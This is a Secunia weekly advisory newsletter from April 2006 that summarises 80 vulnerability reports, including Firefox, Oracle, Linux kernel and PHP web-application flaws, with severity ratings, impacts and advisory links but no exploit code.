========================================================================
The Secunia Weekly Advisory Summary
2006-04-13 - 2006-04-20
This week: 80 advisories
========================================================================
Table of Contents:
1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing
========================================================================
1) Word From Secunia:
The Secunia staff is spending hours every day to assure you the best
and most reliable source for vulnerability information. Every single
vulnerability report is being validated and verified before a Secunia
advisory is written.
Secunia validates and verifies vulnerability reports in many different
ways e.g. by downloading the software and performing comprehensive
tests, by reviewing source code, or by validating the credibility of
the source from which the vulnerability report was issued.
As a result, Secunia's database is the most correct and complete source
for recent vulnerability information available on the Internet.
Secunia Online Vulnerability Database:
http://secunia.com/
========================================================================
2) This Week in Brief:
21 vulnerabilities have been reported in Firefox, which can be
exploited by malicious people to conduct cross-site scripting and
phishing attacks, bypass certain security restrictions, disclose
sensitive information, and potentially compromise a user's system.
Apparently, a number of these vulnerabilities has been fixed in the
Firefox 1.5 branch since October 2005 but has only just been fixed in
the 1.0 branch with the release of version 1.0.8.
Many of these vulnerabilities also affect the Mozilla Suite and have
not yet been patched.
Reference:
http://secunia.com/SA19631
http://secunia.com/SA18703
--
Multiple vulnerabilities have been reported in various Oracle
products. Some have an unknown impact, and others can be exploited to
conduct SQL injection attacks or compromise a vulnerable system.
This advisory currently has a status of partial fix due to lack of
patches for all products to fix one of the vulnerabilities.
Reference:
http://secunia.com/SA19712
--
VIRUS ALERTS:
Secunia has not issued any virus alerts during the week.
========================================================================
3) This Weeks Top Ten Most Read Advisories:
1. [SA19631] Firefox Multiple Vulnerabilities
2. [SA19521] Internet Explorer Window Loading Race Condition Address
Bar Spoofing
3. [SA18680] Microsoft Internet Explorer "createTextRange()" Code
Execution
4. [SA19698] Firefox "View Image" Local Resource Linking Weakness
5. [SA19649] Mozilla SeaMonkey Multiple Vulnerabilities
6. [SA19644] Ubuntu Updates for Multiple Packages
7. [SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability
8. [SA19642] Sphider "settings_dir" File Inclusion Vulnerability
9. [SA19653] PAJAX Arbitrary Code Execution Vulnerabilities
10. [SA19663] Novell GroupWise Messenger Accept-Language Buffer
Overflow
========================================================================
4) Vulnerabilities Summary Listing
Windows:
[SA19662] Web+Shop "storeid" Full Path Disclosure Weakness
UNIX/Linux:
[SA19746] Ubuntu update for firefox
[SA19729] Red Hat update for mozilla
[SA19714] Fedora update for firefox
[SA19696] Red Hat update for firefox
[SA19692] Debian update for horde2
[SA19690] Sysinfoscript sysinfo.cgi Shell Command Injection and Path
Disclosure
[SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability
[SA19671] Xine Playlist File Path Format String Vulnerability
[SA19707] xFlow Multiple Vulnerabilities
[SA19694] PHP Net Tools "host" Shell Command Injection Vulnerability
[SA19691] Gentoo update for cacti
[SA19674] Empire Server Unspecified Vulnerabilities
[SA19718] BannerFarm banners.cgi Cross-Site Scripting Vulnerability
[SA19667] CommuniMail Multiple Cross-Site Scripting Vulnerabilities
[SA19658] Gentoo update for libapreq2
[SA19735] Fedora update for kernel
[SA19683] avast! Insecure Temporary File Creation
[SA19682] Symantec LiveUpdate for Machintosh Privilege Escalation
[SA19675] Debian update for fcheck
[SA19664] Linux Kernel Shared Memory Restrictions Bypass
[SA19657] Linux Kernel Shared Memory Restrictions Bypass
[SA19656] IBM AIX rm_mlcache_file Arbitrary File Overwrite
[SA19724] Linux Kernel x87 Register Information Leak
[SA19716] Avaya CMS / IR "/proc" Denial of Service
[SA19715] FreeBSD FPU x87 Register Information Leak
[SA19709] Linux Kernel "ip_route_input()" Denial of Service
Vulnerability
[SA19687] Debian update for bsdgames
Other:
[SA19740] Cisco IOS XR MPLS Denial of Service Vulnerabilities
Cross Platform:
[SA19743] ActualAnalyzer "rf" File Inclusion Vulnerability
[SA19730] TotalCalendar "inc_dir" File Inclusion Vulnerability
[SA19728] RechnungsZentrale V2 Multiple Vulnerabilities
[SA19726] Internet Photoshow "page" File Inclusion Vulnerability
[SA19712] Oracle Products Multiple Vulnerabilities
[SA19688] Monster Top List File Inclusion and Cross-Site Scripting
Vulnerabilities
[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion
Vulnerability
[SA19680] myEvent Multiple Vulnerabilities
[SA19670] Amaya Attribute Value Buffer Overflow Vulnerabilities
[SA19666] Censtore "page" Shell Command Injection Vulnerability
[SA19653] PAJAX Arbitrary Code Execution Vulnerabilities
[SA19649] Mozilla SeaMonkey Multiple Vulnerabilities
[SA19719] LinPHA Cross-Site Scripting and SQL Injection
Vulnerabilities
[SA19706] phpWebFTP "language" Local File Inclusion
[SA19705] phpGraphy "editwelcome" Authentication Bypass
[SA19703] Neuron Blog Multiple Vulnerabilities
[SA19700] betaboard "FormVal_profile" Profile Script Insertion
[SA19699] LifeType ADOdb "server.php" Insecure Test Script Security
Issue
[SA19697] warforge.NEWS Multiple Vulnerabilities
[SA19689] PowerClan "memberid" SQL Injection Vulnerability
[SA19678] Black Orpheus ClanMemberSkript "userID" SQL Injection
[SA19677] Fuju News Authentication Bypass and SQL Injection
[SA19672] Musicbox Script Insertion and SQL Injection Vulnerabilities
[SA19669] Dubelu PhpGuestbook Comment Script Insertion Vulnerability
[SA19668] MyBB Cross-Site Scripting and Variable Manipulation
Vulnerabilities
[SA19665] Coppermine Photo Gallery "file" Local File Inclusion
Vulnerability
[SA19661] PHP Album "data_dir" File Inclusion Vulnerability
[SA19650] Article Publisher Pro SQL Injection Vulnerabilities
[SA19647] phpWebSite "hub_dir" Local File Inclusion Vulnerability
[SA19645] MODx Cross-Site Scripting and Directory Traversal
[SA19663] Novell GroupWise Messenger Accept-Language Buffer Overflow
[SA19725] AWStats "config" Cross-Site Scripting and Full Path
Disclosure
[SA19720] Plexum X5 "plexum.php" SQL Injection Vulnerability
[SA19711] bMachine Search Feature Cross-Site Scripting
[SA19710] Calendarix "ycyear" Cross-Site Scripting Vulnerability
[SA19704] ShoutBOOK Multiple Script Insertion Vulnerabilities
[SA19701] IntelliLink Pro Multiple Cross-Site Scripting
Vulnerabilities
[SA19695] KCScripts Portal Pack Multiple Cross-Site Scripting
Vulnerabilities
[SA19685] PMTool "order" SQL Injection Vulnerabilities
[SA19681] planetSearch+ "search_exp" Cross-Site Scripting
Vulnerability
[SA19679] LinPHA Cross-Site Scripting Vulnerabilities
[SA19673] Bitweaver "error" Cross-Site Scripting Vulnerability
[SA19660] TinyWebGallery "twg_album" Cross-Site Scripting
Vulnerability
[SA19659] phpMyAdmin "sql_query" Cross-Site Scripting and SQL Code
Execution
[SA19655] Visale Cross-Site Scripting Vulnerabilities
[SA19654] Boardsolution "keyword" Cross-Site Scripting Vulnerability
[SA19652] phpFaber TopSites "page" Cross-Site Scripting Vulnerability
[SA19651] Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities
[SA19648] FarsiNews "selected_search_arch" Cross-Site Scripting
[SA19646] LifeType Template "show" Cross-Site Scripting Vulnerability
[SA19698] Firefox "View Image" Local Resource Linking Weakness
========================================================================
5) Vulnerabilities Content Listing
Windows:--
[SA19662] Web+Shop "storeid" Full Path Disclosure Weakness
Critical: Not critical
Where: From remote
Impact: Exposure of system information
Released: 2006-04-14
Revnic Vasile has reported a weakness in Web+Shop, which can be
exploited by malicious people to disclose system information.
Full Advisory:
http://secunia.com/advisories/19662/
UNIX/Linux:--
[SA19746] Ubuntu update for firefox
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released: 2006-04-20
Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service), conduct cross-site scripting and phishing
attacks, bypass certain security restrictions, disclose sensitive
information, and potentially compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19746/
--
[SA19729] Red Hat update for mozilla
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released: 2006-04-19
Red Hat has issued an update for mozilla. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19729/
--
[SA19714] Fedora update for firefox
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released: 2006-04-19
Fedora has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19714/
--
[SA19696] Red Hat update for firefox
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, Exposure
of sensitive information, DoS, System access
Released: 2006-04-17
Red Hat has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks, bypass certain security
restrictions, disclose sensitive information, and potentially
compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19696/
--
[SA19692] Debian update for horde2
Critical: Highly critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2006-04-17
Debian has issued an update for horde2. This fixes two vulnerabilities,
which can be exploited by malicious people to disclose sensitive
information and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19692/
--
[SA19690] Sysinfoscript sysinfo.cgi Shell Command Injection and Path
Disclosure
Critical: Highly critical
Where: From remote
Impact: Exposure of system information, System access
Released: 2006-04-17
rgod has reported a vulnerability and a weakness in Sysinfoscript,
which can be exploited by malicious people to disclose system
information or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19690/
--
[SA19676] Avaya CMS / IR Sendmail Memory Corruption Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-14
Avaya has acknowledged a vulnerability in Avaya CMS and Avaya IR, which
can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19676/
--
[SA19671] Xine Playlist File Path Format String Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-19
c0ntex has reported a vulnerability in xine-ui, which potentially can
be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19671/
--
[SA19707] xFlow Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-04-19
r0t has reported multiple vulnerabilities in xFlow, which can be
exploited by malicious users to conduct SQL injection attacks and by
malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19707/
--
[SA19694] PHP Net Tools "host" Shell Command Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-04-19
FOX_MULDER has discovered a vulnerability in PHP Net Tools, which
potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/19694/
--
[SA19691] Gentoo update for cacti
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Manipulation of
data, Exposure of system information, System access
Released: 2006-04-17
Gentoo has issued an update for cacti. This fixes two security issues
and some vulnerabilities, which can be exploited by malicious people to
disclose system information, conduct cross-site scripting attacks,
execute arbitrary SQL code, and potentially compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/19691/
--
[SA19674] Empire Server Unspecified Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2006-04-18
Some vulnerabilities with unknown impacts have been reported in Empire
Server.
Full Advisory:
http://secunia.com/advisories/19674/
--
[SA19718] BannerFarm banners.cgi Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
r0t has reported a vulnerability in BannerFarm, which can be exploited
by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19718/
--
[SA19667] CommuniMail Multiple Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
r0t has reported some vulnerabilities in CommuniMail, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19667/
--
[SA19658] Gentoo update for libapreq2
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2006-04-18
Gentoo has issued an update for libapreq2. This fixes a vulnerability,
which potentially can be exploited by malicious people to cause a DoS
(Denial of Service).
Full Advisory:
http://secunia.com/advisories/19658/
--
[SA19735] Fedora update for kernel
Critical: Less critical
Where: Local system
Impact: Security Bypass, Exposure of sensitive information, DoS
Released: 2006-04-20
Fedora has issued an update for the kernel. This fixes some
vulnerabilities, which can be exploited by malicious, local users to
cause a DoS (Denial of Service), gain knowledge of potentially
sensitive information, or bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/19735/
--
[SA19683] avast! Insecure Temporary File Creation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-04-18
Julian L. has reported a vulnerability in avast! Linux Home Edition,
which can be exploited by malicious, local users to perform certain
actions on a vulnerable system with escalated privileges.
Full Advisory:
http://secunia.com/advisories/19683/
--
[SA19682] Symantec LiveUpdate for Machintosh Privilege Escalation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-04-18
A vulnerability has been reported in Symantec LiveUpdate for
Machintosh, which can be exploited by malicious, local users to gain
escalated privileges.
Full Advisory:
http://secunia.com/advisories/19682/
--
[SA19675] Debian update for fcheck
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-04-17
Debian has issued an update for fcheck. This fixes a vulnerability,
which can be exploited by malicious, local users to perform certain
actions on a vulnerable system with escalated privileges.
Full Advisory:
http://secunia.com/advisories/19675/
--
[SA19664] Linux Kernel Shared Memory Restrictions Bypass
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2006-04-19
A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to bypass certain security
restrictions.
Full Advisory:
http://secunia.com/advisories/19664/
--
[SA19657] Linux Kernel Shared Memory Restrictions Bypass
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2006-04-19
A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to bypass certain security
restrictions.
Full Advisory:
http://secunia.com/advisories/19657/
--
[SA19656] IBM AIX rm_mlcache_file Arbitrary File Overwrite
Critical: Less critical
Where: Local system
Impact: Manipulation of data
Released: 2006-04-18
A vulnerability has been reported in AIX, which can be exploited by
malicious, local users to perform certain actions with escalated
privileges.
Full Advisory:
http://secunia.com/advisories/19656/
--
[SA19724] Linux Kernel x87 Register Information Leak
Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2006-04-19
A security issue has been reported in Linux Kernel, which can be
exploited by malicious, local users to gain knowledge of potentially
sensitive information.
Full Advisory:
http://secunia.com/advisories/19724/
--
[SA19716] Avaya CMS / IR "/proc" Denial of Service
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2006-04-18
Avaya has acknowledged a vulnerability in Avaya CMS and Avaya IR, which
can be exploited by malicious, local users to cause a DoS (Denial of
Service).
Full Advisory:
http://secunia.com/advisories/19716/
--
[SA19715] FreeBSD FPU x87 Register Information Leak
Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2006-04-19
A security issue has been reported in FreeBSD, which can be exploited
by malicious, local users to gain knowledge of potentially sensitive
information.
Full Advisory:
http://secunia.com/advisories/19715/
--
[SA19709] Linux Kernel "ip_route_input()" Denial of Service
Vulnerability
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2006-04-19
A vulnerability has been reported in Linux Kernel, which can be
exploited by malicious, local users to cause a DoS (Denial of
Service).
Full Advisory:
http://secunia.com/advisories/19709/
--
[SA19687] Debian update for bsdgames
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2006-04-17
Debian has issued an update for bsdgames. This fixes a vulnerability,
which can be exploited by malicious, local users to gain escalated
privileges.
Full Advisory:
http://secunia.com/advisories/19687/
Other:--
[SA19740] Cisco IOS XR MPLS Denial of Service Vulnerabilities
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2006-04-20
Three vulnerabilities have been reported in Cisco IOS XR, which can be
exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/19740/
Cross Platform:--
[SA19743] ActualAnalyzer "rf" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-20
Aesthetico has reported a vulnerability in ActualAnalyzer, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19743/
--
[SA19730] TotalCalendar "inc_dir" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-19
VietMafia has reported a vulnerability in TotalCalendar, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19730/
--
[SA19728] RechnungsZentrale V2 Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Manipulation of data, System access
Released: 2006-04-19
GroundZero Security Research has discovered some vulnerabilities in
RechnungsZentrale V2, which can be exploited by malicious people to
conduct SQL injection attacks and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19728/
--
[SA19726] Internet Photoshow "page" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-19
Hessam-x has discovered a vulnerability in Internet Photoshow, which
can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/19726/
--
[SA19712] Oracle Products Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Unknown, Manipulation of data, System access
Released: 2006-04-19
Multiple vulnerabilities have been reported in various Oracle products.
Some have an unknown impact, and others can be exploited to conduct SQL
injection attacks or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19712/
--
[SA19688] Monster Top List File Inclusion and Cross-Site Scripting
Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, System access
Released: 2006-04-17
Two vulnerabilities have been reported in Monster Top List, which can
be exploited by malicious people to conduct cross-site scripting
attacks and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19688/
--
[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion
Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-20
VietMafia has reported a vulnerability in I-Rater Platinum, which can
be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19684/
--
[SA19680] myEvent Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, System access
Released: 2006-04-18
Some vulnerabilities have been discovered in myEvent, which can be
exploited by malicious users to conduct script insertion and SQL
injection attacks, and by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/19680/
--
[SA19670] Amaya Attribute Value Buffer Overflow Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-14
Thomas Waldegger has discovered two vulnerabilities in Amaya, which can
be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/19670/
--
[SA19666] Censtore "page" Shell Command Injection Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-17
FOX_MULDER has reported a vulnerability in Censtore, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19666/
--
[SA19653] PAJAX Arbitrary Code Execution Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-04-14
RedTeam has reported two vulnerabilities in PAJAX, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19653/
--
[SA19649] Mozilla SeaMonkey Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Exposure of sensitive information, System
access
Released: 2006-04-14
Multiple vulnerabilities have been reported in Mozilla SeaMonkey, which
can be exploited by malicious people to bypass certain security
restrictions, disclose sensitive information, and compromise a user's
system.
Full Advisory:
http://secunia.com/advisories/19649/
--
[SA19719] LinPHA Cross-Site Scripting and SQL Injection
Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-04-19
Some vulnerabilities have been reported in LinPHA, which can be
exploited by malicious people to conduct cross-site scripting and SQL
injection attacks.
Full Advisory:
http://secunia.com/advisories/19719/
--
[SA19706] phpWebFTP "language" Local File Inclusion
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-04-18
arko.dhar has discovered a vulnerability in phpWebFTP, which can be
exploited by malicious people to disclose sensitive information.
Full Advisory:
http://secunia.com/advisories/19706/
--
[SA19705] phpGraphy "editwelcome" Authentication Bypass
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2006-04-18
rgod has discovered a vulnerability in phpGraphy, which can be
exploited by malicious people to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/19705/
--
[SA19703] Neuron Blog Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-04-19
Some vulnerabilities have been discovered in Neuron Blog, which can be
exploited by malicious people to conduct script insertion attacks and
SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19703/
--
[SA19700] betaboard "FormVal_profile" Profile Script Insertion
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-18
Simon MOREL has reported a vulnerability in betaboard, which can be
exploited by malicious people to conduct script insertion attacks.
Full Advisory:
http://secunia.com/advisories/19700/
--
[SA19699] LifeType ADOdb "server.php" Insecure Test Script Security
Issue
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, System access
Released: 2006-04-19
A security issue has been discovered in LifeType, which can be
exploited by malicious people to execute arbitrary SQL code and
potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19699/
--
[SA19697] warforge.NEWS Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-04-19
Some vulnerabilities have been discovered in warforge.NEWS, which can
be exploited by malicious users to conduct script insertion attacks,
and by malicious people to conduct script insertion attacks and SQL
injection attacks.
Full Advisory:
http://secunia.com/advisories/19697/
--
[SA19689] PowerClan "memberid" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-04-17
d4igoro has reported a vulnerability in PowerClan, which can be
exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19689/
--
[SA19678] Black Orpheus ClanMemberSkript "userID" SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-04-19
snatcher has discovered a vulnerability in Black Orpheus
ClanMemberSkript, which can be exploited by malicious people to conduct
SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19678/
--
[SA19677] Fuju News Authentication Bypass and SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Manipulation of data
Released: 2006-04-17
snatcher has reported two vulnerabilities in Fuju News, which can be
exploited by malicious people to bypass certain security restrictions
and conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19677/
--
[SA19672] Musicbox Script Insertion and SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-04-17
r0t has reported some vulnerabilities in Musicbox, which can be
exploited by malicious people to conduct script insertion and SQL
injection attacks.
Full Advisory:
http://secunia.com/advisories/19672/
--
[SA19669] Dubelu PhpGuestbook Comment Script Insertion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
r0t has discovered a vulnerability in Dubelu PhpGuestbook, which can be
exploited by malicious people to conduct script insertion attacks.
Full Advisory:
http://secunia.com/advisories/19669/
--
[SA19668] MyBB Cross-Site Scripting and Variable Manipulation
Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Manipulation of
data
Released: 2006-04-18
Two vulnerabilities have been reported in MyBB, which can be exploited
by malicious people to conduct cross-site scripting and SQL injection
attacks, and manipulate certain information.
Full Advisory:
http://secunia.com/advisories/19668/
--
[SA19665] Coppermine Photo Gallery "file" Local File Inclusion
Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-04-19
imei addmimistrator has discovered a vulnerability in Coppermine Photo
Gallery, which can be exploited by malicious people to disclose
sensitive information.
Full Advisory:
http://secunia.com/advisories/19665/
--
[SA19661] PHP Album "data_dir" File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-04-18
rgod has discovered a vulnerability in PHP Album, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19661/
--
[SA19650] Article Publisher Pro SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-04-19
Two vulnerabilities have been reported in Article Publisher Pro, which
can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19650/
--
[SA19647] phpWebSite "hub_dir" Local File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2006-04-17
rgod has reported a vulnerability in phpWebSite, which can be exploited
by malicious people to disclose sensitive information and potentially
compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/19647/
--
[SA19645] MODx Cross-Site Scripting and Directory Traversal
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Exposure of sensitive information
Released: 2006-04-18
Rusydi Hasan M has reported two vulnerabilities in MODx, which can be
exploited by malicious people to conduct cross-site scripting attacks
and disclose sensitive information.
Full Advisory:
http://secunia.com/advisories/19645/
--
[SA19663] Novell GroupWise Messenger Accept-Language Buffer Overflow
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2006-04-14
A vulnerability has been reported in Novell GroupWise Messenger, which
can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/19663/
--
[SA19725] AWStats "config" Cross-Site Scripting and Full Path
Disclosure
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Exposure of system information
Released: 2006-04-19
r0t has discovered a vulnerability in AWStats, which can be exploited
by malicious people to disclose system information and conduct
cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19725/
--
[SA19720] Plexum X5 "plexum.php" SQL Injection Vulnerability
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2006-04-19
r0t has reported a vulnerability in Plexum X5, which can be exploited
by malicious users to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19720/
--
[SA19711] bMachine Search Feature Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-18
almokanna has reported a vulnerability in bMachine, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19711/
--
[SA19710] Calendarix "ycyear" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-18
botan has reported a vulnerability in Calendarix, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19710/
--
[SA19704] ShoutBOOK Multiple Script Insertion Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-18
Some vulnerabilities have been discovered in ShoutBOOK, which can be
exploited by malicious people to conduct script insertion attacks.
Full Advisory:
http://secunia.com/advisories/19704/
--
[SA19701] IntelliLink Pro Multiple Cross-Site Scripting
Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
r0t has reported some vulnerabilities in IntelliLink Pro, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19701/
--
[SA19695] KCScripts Portal Pack Multiple Cross-Site Scripting
Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-20
r0t has reported some vulnerabilities in KCScripts Portal Pack, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Full Advisory:
http://secunia.com/advisories/19695/
--
[SA19685] PMTool "order" SQL Injection Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2006-04-19
Pratiksha Doshi has discovered some vulnerabilities in PMTool, which
can be exploited by malicious users to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/19685/
--
[SA19681] planetSearch+ "search_exp" Cross-Site Scripting
Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-17
d4igoro has reported a vulnerability in planetSearch+, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19681/
--
[SA19679] LinPHA Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
d4igoro has discovered some vulnerabilities in LinPHA, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19679/
--
[SA19673] Bitweaver "error" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-17
KaDaL-X has reported a vulnerability in Bitweaver, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19673/
--
[SA19660] TinyWebGallery "twg_album" Cross-Site Scripting
Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-17
Qex has reported a vulnerability in TinyWebGallery, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19660/
--
[SA19659] phpMyAdmin "sql_query" Cross-Site Scripting and SQL Code
Execution
Critical: Less critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting
